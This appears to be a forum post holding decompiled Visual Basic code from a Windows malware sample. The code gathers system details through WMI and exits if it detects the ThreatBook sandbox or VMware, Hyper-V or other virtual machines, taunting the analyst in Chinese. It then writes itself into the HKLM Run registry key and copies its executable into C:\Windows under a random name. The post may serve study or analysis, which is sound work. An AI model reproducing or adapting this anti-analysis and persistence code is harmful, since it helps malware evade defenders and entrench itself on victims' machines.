Private Sub Form_Load() '402050
Dim var_84 As App
Dim var_88 As App
Dim var_8C As App
loc_0040217D: var_1E4 = "Win32_ComputerSystem"
loc_004021CC: var_BC = GetObject("winmgmts:", var_AC)
loc_00402215: var_eax = %dl
loc_0040221F: Set var_24 = %dl
loc_0040226B: call For Each(var_23C, var_244, var_240, var_238, var_34, var_24, 0, esi, undef 'Ignore this '__vbaFreeVarList)
loc_00402277:
loc_00402279: If For Each(var_23C, var_244, var_240, var_238, var_34, var_24, 0, esi, undef 'Ignore this '__vbaFreeVarList) = 0 Then GoTo loc_00402ECC
loc_004022A2: var_1C4 = "计算机名称: "
loc_004022AC: var_1D4 = "vbCrLf"
loc_004022CB: var_eax = %dl
loc_00402335: var_1C4 = "状态: "
loc_0040233F: var_1D4 = "vbCrLf"
loc_0040235E: var_eax = %dl
loc_004023C8: var_1C4 = "类型: "
loc_004023D2: var_1D4 = "vbCrLf"
loc_004023F1: var_eax = %dl
loc_0040245B: var_1C4 = "生产厂家: "
loc_00402465: var_1D4 = "vbCrLf"
loc_00402484: var_eax = %dl
loc_004024EE: var_1C4 = "型号: "
loc_004024F8: var_1D4 = "vbCrLf"
loc_00402517: var_eax = %dl
loc_00402524: var_BC = var_44 & "计算机名称: " & %dl & "vbCrLf" & "状态: " & %dl & "vbCrLf" & "类型: " & %dl & "vbCrLf" & "生产厂家: " & %dl & "vbCrLf" & "型号: " & %dl
loc_00402587: var_1C4 = "内存: ~"
loc_004025A5: var_1E4 = "Gib"
loc_004025AF: var_1F4 = "vbCrLf"
loc_004025CE: var_eax = %dl
loc_00402601: var_DC = var_BC & "vbCrLf" & "内存: ~" & %dl / 1073741824 & "Gib"
loc_00402665: var_1C4 = "域: "
loc_0040266F: var_1D4 = "vbCrLf"
loc_0040268E: var_eax = %dl
loc_004026DA: var_1C4 = "当前用户: "
loc_004026EA: var_1D4 = "vbCrLf"
loc_00402721: var_eax = %dl
loc_0040278B: var_1C4 = "启动状态"
loc_00402795: var_1D4 = "vbCrLf"
loc_004027B4: var_eax = %dl
loc_0040281E: var_1C4 = "该计算机属于"
loc_00402828: var_1D4 = "vbCrLf"
loc_00402847: var_eax = %dl
loc_004028B1: var_1C4 = "系统类型"
loc_004028BB: var_1D4 = "vbCrLf"
loc_004028C5: var_9C = var_DC & "vbCrLf" & "域: " & %dl & "vbCrLf" & "当前用户: " & %dl & "vbCrLf" & "启动状态" & %dl & "vbCrLf" & "该计算机属于" & %dl & "vbCrLf" & "系统类型"
loc_004028DA: var_eax = %dl
loc_00402944: var_1C4 = "计算机类类型"
loc_0040294E: var_1D4 = "vbCrLf"
loc_0040296D: var_eax = %dl
loc_00402992: var_44 = var_9C & %dl & "vbCrLf" & "计算机类类型" & %dl & "vbCrLf" & "计算机类类型" & %dl & "vbCrLf" & "计算机类类型" & %dl & "vbCrLf"
loc_004029DA: var_1C4 = "Red Hat"
loc_004029E4: var_1D4 = "KVM"
loc_004029EE: var_1E4 = "vbccsb"
loc_004029F8: var_eax = %dl
loc_00402A25: var_eax = %dl
loc_00402A60: var_eax = %dl
loc_00402A95: var_208 = CBool((%dl = "Red Hat") And (%dl = "KVM") And (%dl = "vbccsb"))
loc_00402ABA: If var_208 = 0 Then GoTo loc_00402B61
loc_00402B0E: var_9C = "你竟然要用微步测试我???"
loc_00402B5B: End
loc_00402B61: 'Referenced from: 00402ABA
loc_00402B73: var_eax = %dl
loc_00402B87: var_eax = %dl
loc_00402B9B: var_eax = %dl
loc_00402BAF: var_eax = %dl
loc_00402BCF: var_6C = CStr(var_9C)
loc_00402BF7: var_A4 = Replace(var_6C, "Virtual", vbNullString, 1, -1, 0)
loc_00402C07: var_70 = CStr(var_DC)
loc_00402C18: var_E4 = Replace(var_70, "VMware", vbNullString, 1, -1, 0)
loc_00402C3F: var_74 = CStr(var_12C)
loc_00402C52: var_134 = Replace(var_74, "Hyper-V", vbNullString, 1, -1, 0)
loc_00402C77: var_78 = CStr(var_17C)
loc_00402C8A: var_184 = Replace(var_78, "Hyper-V", vbNullString, 1, -1, 0)
loc_00402CAD: var_eax = %dl
loc_00402CBA: var_ret_7 = (Replace(var_6C, "Virtual", vbNullString, 1, -1, 0) <> %dl)
loc_00402CDA: var_eax = %dl
loc_00402CE7: var_ret_8 = (Replace(var_70, "VMware", vbNullString, 1, -1, 0) <> %dl)
loc_00402CF5: call Or(var_11C, var_ret_8, var_ret_7)
loc_00402D15: var_eax = %dl
loc_00402D22: var_ret_9 = (Replace(var_74, "Hyper-V", vbNullString, 1, -1, 0) <> %dl)
loc_00402D30: call Or(var_16C, var_ret_9, Or(var_11C, var_ret_8, var_ret_7))
loc_00402D50: var_eax = %dl
loc_00402D5D: var_ret_A = (Replace(var_78, "Hyper-V", vbNullString, 1, -1, 0) <> %dl)
loc_00402D6B: call Or(var_1BC, var_ret_A, Or(var_16C, var_ret_9, Or(var_11C, var_ret_8, var_ret_7)))
loc_00402D7B: var_208 = CBool(Or(var_1BC, var_ret_A, Or(var_16C, var_ret_9, Or(var_11C, var_ret_8, var_ret_7))))
loc_00402DFA: If var_208 = 0 Then GoTo loc_00402EA1
loc_00402E4E: var_9C = "你竟然要用虚拟机测试我???"
loc_00402E9B: End
loc_00402EA1: 'Referenced from: 00402DFA
loc_00402EC1: Next var_240
loc_00402EC7: GoTo loc_00402277
loc_00402ECC: 'Referenced from: 00402279
loc_00402EE7: Randomize(10)
loc_00402F18: Set var_68 = CreateObject("wscript.shell", 0)
loc_00402F47: var_84 = Global.App
loc_00402F6E: var_6C = Global.EXEName
loc_00402F97: var_94 = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & var_6C
loc_00402FD0: var_88 = Global.App
loc_00402FF7: var_70 = Global.Path
loc_00403038: var_8C = Global.App
loc_0040305F: var_74 = Global.EXEName
loc_004030BD: var_A4 = var_70 & var_00401D84 & var_74 & ".exe"
loc_00403111: var_68 = Me.regwrite
loc_0040316E: var_1E4 = "C:\Windows\"
loc_004031F7: var_54 = "C:\Windows\" + Str(Int((Rnd(10) * 100000)))
loc_00403242: var_84 = Global.App
loc_00403269: var_6C = Global.Path
loc_004032AA: var_88 = Global.App
loc_004032D1: var_70 = Global.EXEName
loc_00403328: FileCopy var_6C & var_00401D84 & var_70 & ".exe", CStr(var_54)
loc_00403382: GoTo loc_00403455
loc_00403454: Exit Sub
loc_00403455: 'Referenced from: 00403382
loc_00403499: Exit Sub
End Sub |
楼主: skystars
发表于 2019-4-1 10:11:38
